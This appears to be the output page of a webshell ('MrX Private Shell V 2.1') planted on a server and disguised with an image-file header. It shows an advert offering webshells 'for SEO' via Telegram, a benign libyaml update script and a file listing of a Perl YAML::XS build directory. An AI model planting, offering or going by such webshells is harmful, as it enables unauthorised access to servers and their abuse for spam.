����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/bash
libyaml=../../libyaml
source="$libyaml/src"
include="$libyaml/include"
need_branch=perl-yaml-xs
if [ ! -d "$source" ]; then
echo "'$source' does not exist"
exit 1
fi
libyaml_branch="$(
cd "$libyaml"
git rev-parse --abbrev-ref HEAD
)"
if [ "$libyaml_branch" != "$need_branch" ]; then
echo "libyaml must be set to branch '$need_branch'"
exit 1
fi
diff="$(
diff -q $source . |
grep -v '^Only'
diff -q $include . |
grep -v '^Only'
)"
if [ -n "$diff" ]; then
echo "*** Updating from libyaml repository ***"
diff -q "$source" . | grep -v '^Only'
cp "$source"/*.{c,h} .
diff -q "$include" . | grep -v '^Only'
cp "$include"/*.h .
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| lib | Folder | 0755 |
|
|
| LibYAML.bs | File | 0 B | 0644 |
|
| LibYAML.c | File | 14.71 KB | 0644 |
|
| LibYAML.o | File | 305.26 KB | 0644 |
|
| LibYAML.xs | File | 6.84 KB | 0644 |
|
| License | File | 1.13 KB | 0644 |
|
| MYMETA.json | File | 889 B | 0644 |
|
| MYMETA.yml | File | 543 B | 0644 |
|
| Makefile | File | 29.59 KB | 0644 |
|
| Makefile.PL | File | 812 B | 0644 |
|
| api.c | File | 35.75 KB | 0644 |
|
| api.o | File | 307.51 KB | 0644 |
|
| config.h | File | 2.23 KB | 0644 |
|
| dumper.c | File | 9.83 KB | 0644 |
|
| dumper.o | File | 95.38 KB | 0644 |
|
| emitter.c | File | 64.82 KB | 0644 |
|
| emitter.o | File | 286.77 KB | 0644 |
|
| loader.c | File | 13.76 KB | 0644 |
|
| loader.o | File | 110.03 KB | 0644 |
|
| parser.c | File | 43.98 KB | 0644 |
|
| parser.o | File | 196.98 KB | 0644 |
|
| perl_libyaml.c | File | 60.95 KB | 0644 |
|
| perl_libyaml.h | File | 3.63 KB | 0644 |
|
| perl_libyaml.o | File | 601.5 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| ppport.h | File | 170.76 KB | 0644 |
|
| ppport_sort.h | File | 1012 B | 0644 |
|
| reader.c | File | 16.29 KB | 0644 |
|
| reader.o | File | 74.75 KB | 0644 |
|
| scanner.c | File | 96.61 KB | 0644 |
|
| scanner.o | File | 384.85 KB | 0644 |
|
| test.pl | File | 97 B | 0644 |
|
| update.sh | File | 673 B | 0755 |
|
| writer.c | File | 3.95 KB | 0644 |
|
| writer.o | File | 50.91 KB | 0644 |
|
| yaml.h | File | 53.16 KB | 0644 |
|
| yaml_private.h | File | 29.79 KB | 0644 |
|